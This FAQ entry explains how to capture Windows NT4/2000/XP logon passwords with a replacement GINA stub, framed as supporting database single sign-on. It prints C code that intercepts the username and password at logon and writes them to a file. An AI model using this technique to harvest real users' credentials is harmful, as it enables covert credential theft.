15. How do I grab the users password under NT4/2000/XP?
Microsoft actually document how to do this (it's a common
requirement for programs which need to log into a database using the users own security
credentials).
Warning - this code not tested under Vista
Look at the GINASTUB sample which comes with the Win32
Platform SDK. Essentially, the technique consists of replacing the default GINA with your
own, then having your GINA LoadLibrary the default one and call its entry points as
required, grabbing the data as it flies past. I have reproduced the important function
here, with my own code added for saving the username and password to a file in ANSI
format.
int WINAPI WlxLoggedOutSAS (PVOID pWlxContext,
DWORD
dwSasType,
PLUID
pAuthenticationId,
PSID
pLogonSid,
PDWORD
pdwOptions,
PHANDLE
phToken,
PWLX_MPR_NOTIFY_INFO
pMprNotifyInfo,
PVOID
*pProfile)
{
HANDLE hFile ;
DWORD dwBytesWrit ;
TCHAR szBuffer [130];
TCHAR szUserName [64];
TCHAR szPassword [64];
iRet = GWlxLoggedOutSAS (pWlxContext,
dwSasType,
pAuthenticationId,
pLogonSid,
pdwOptions,
phToken,
pMprNotifyInfo,
pProfile);
if (iRet == WLX_SAS_ACTION_LOGON)
{
WideCharToMultiByte (CP_ACP, 0,
pMprNotifyInfo->pszUserName,
-1,
szUserName,
sizeof
(szUserName),
NULL,
NULL);
WideCharToMultiByte (CP_ACP, 0,
pMprNotifyInfo->pszPassword,
-1,
szPassword,
sizeof
(szPassword),
NULL,
NULL);
wsprintf (szBuffer, "%s,%s\n",
szUserName,
szPassword);
< insert code here to encrypt the data in szBuffer >
hFile = CreateFile (<
Some unique filename in a fixed location >,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
WriteFile (hFile,
(LPCVOID)(szBuffer),
(DWORD)(strlen
(szBuffer)),
&dwBytesWrit,
NULL);
CloseHandle (hFile);
}
}
return iRet;
}
